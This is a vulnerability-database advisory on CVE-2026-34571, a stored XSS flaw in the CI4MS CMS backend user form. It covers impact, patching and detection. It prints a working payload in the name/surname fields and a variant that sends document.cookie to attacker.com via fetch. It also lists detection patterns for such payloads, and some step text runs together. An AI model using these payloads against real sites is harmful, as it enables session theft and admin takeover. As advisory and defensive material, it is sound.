
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34571 is a critical Stored Cross-Site Scripting (Stored XSS) vulnerability in the backend user management functionality of CI4MS, a CodeIgniter 4-based CMS skeleton. The vulnerability affects all versions up to and including 0.28.6.0, and was published on March 31, 2026, with a patch released in version 0.31.0.0. It carries a CVSS v3.1 base score of 9.9 (Critical) per the GitHub Advisory Database, with an alternative score of 9.0 noted in Feedly threat intelligence data (Github Advisory, Feedly).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically the failure to apply contextual output encoding or input sanitization on the name and surname fields in the backend user creation form at /backend/users. User-supplied data is stored directly in the database and later rendered into the backend users listing page without HTML encoding, allowing injected JavaScript to execute in the browsers of any authenticated backend user who visits the page. The attack requires only low privileges (the ability to create a user account) and no additional user interaction beyond the initial payload injection, as the script executes automatically on page load for all subsequent visitors (Github Advisory, GitHub Security Advisory).
Successful exploitation enables persistent execution of attacker-controlled JavaScript in privileged backend contexts, leading to session cookie theft, full administrative account takeover, and CSRF-like unauthorized actions performed on behalf of administrators. Because the payload executes automatically on every page load for all backend users, a single injection can compromise all active administrative sessions simultaneously. Additional attack vectors enabled by the persistent XSS include keylogger injection, credential harvesting, malicious redirects, and privilege escalation if a high-privilege user views the affected page (Github Advisory).
A detailed proof-of-concept (PoC) is publicly available in the GitHub Security Advisory, including specific endpoint URLs, vulnerable field names, and a working payload (adnan"><img src=1 onerror=alert(document.cookie)>). The EPSS score is approximately 0.071% (22nd percentile), indicating a low but non-negligible probability of exploitation in the wild within 30 days. There is currently no evidence of active in-the-wild exploitation or threat actor attribution, and the vulnerability is not listed in the CISA KEV catalog (Github Advisory, Feedly).
ci4-cms-erp/ci4ms./backend/users and click "Add New User" to open the user creation form.name or surname field, enter a malicious payload such as: adnan"><img src=1 onerror=alert(document.cookie)> — or replace the alert with a script that exfiltrates cookies to an attacker-controlled server (e.g., onerror=fetch('https://attacker.com/?c='+document.cookie))./backend/users will automatically execute the injected JavaScript in their browser./backend/users; unusual GET/POST requests to attacker-controlled URLs containing URL-encoded cookie data in query parameters./backend/users endpoint being accessed by accounts with unusual or newly created usernames containing HTML special characters (", >, <, onerror, img src).users table where the name or surname fields contain HTML tags, JavaScript event handlers (e.g., onerror, onload), or script-related strings.The vendor has released a patch in version 0.31.0.0, which implements global input validation, enhanced XSS protection, and CSRF token improvements as part of a major security and framework update. All users of CI4MS versions <= 0.28.6.0 should upgrade to version 0.31.0.0 immediately by running composer update after backing up their database. As interim mitigations, administrators should implement Content Security Policy (CSP) headers to restrict unauthorized JavaScript execution, apply strict output encoding for all user-controlled input rendered in the backend interface, and audit existing user records for malicious payloads in name and surname fields (Github Advisory, CI4MS Release).
The vulnerability received coverage from The Hacker Wire, which published an article specifically on the CI4MS stored XSS leading to admin account compromise (The Hacker Wire). Social media discussion was observed on Mastodon and Bluesky shortly after disclosure, with community accounts sharing the CVE details. The vulnerability was also indexed by INCIBE-CERT, VulDB, and ENISA's EUVD (EUVD-2026-18088), indicating broad awareness across European and Spanish cybersecurity communities (Feedly).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."